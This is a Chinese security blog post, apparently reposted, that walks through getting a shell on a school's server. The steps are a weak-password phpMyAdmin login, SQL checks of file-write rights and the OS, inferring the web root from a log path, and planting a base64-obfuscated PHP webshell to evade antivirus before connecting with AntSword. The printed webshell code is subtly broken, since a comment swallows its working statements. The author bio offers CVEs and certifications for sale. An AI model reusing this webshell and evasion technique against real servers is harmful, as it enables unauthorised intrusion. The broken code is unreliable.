文章总结: 本文记录了一次学校系统渗透测试过程,通过发现phpmyadmin弱口令登录并利用MySQL文件写入权限成功获取服务器shell。作者详细描述了检查权限、查询系统信息、推测网站根目录、使用base64编码绕过安全检测等步骤,最终使用蚁剑连接shell并获得高危6rank评级。
综合评分: 81
文章分类: 渗透测试,WEB安全,漏洞分析,实战经验,红队
记录一次某学校系统的一次getshell
实战安全研究
2025年12月6日 10:00
广东
以下文章来源于安全小生
,作者安全小生
安全小生
.
网安菜鸡的日记 师傅们别投诉我啊哭死了需要cve和nisp二级的可找我,nisp二级享全网最低价
记录一次某学校系统的一次getshell
无验证码 于是爆破一下 但是爆破无果 于是扫描一下该路径下的目录
发现存在phpmyadmin路径
于是访问 惊喜的是发现弱口令进去了
既然进入了phpmyadmin 那当然要尝试是否可以写马进去 看看能不能getshell
首先是查看是否具备写入权限
select file_priv from mysql.user where user='root' and host='localhost';
也是返回了Y 具备可写权限
第二步就是看主机服务器是什么
select @@version_compile_os;
看返回值是WIN32主机
因为这里写入的路径不是默认路径 不是默认路径拿去猜的话 那是几乎不能的
所以我是选择查询日志路径
show variables like 'slow_query_log_file';
进而推测出根目录为D:\xxxx\xxxxx\www\
这里因为上传普通的一句话木马会被主机杀掉
于是尝试一下base64编码的一句话木马
<?php$code = base64_decode("ZXZhbCgkYXNzKTs="); // 解码后是 "eval($ass);" $ass = $pass; @eval($code); ?>
也是执行成功
用蚁剑也是成功连接上了
最终也是拿下高危6rank
欢迎各位师傅关注微信公众号“安全小生” 小生会不定时分享一些案例
免责声明:
本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。
任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。
本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我。
本文转载自:实战安全研究 《记录一次某学校系统的一次getshell》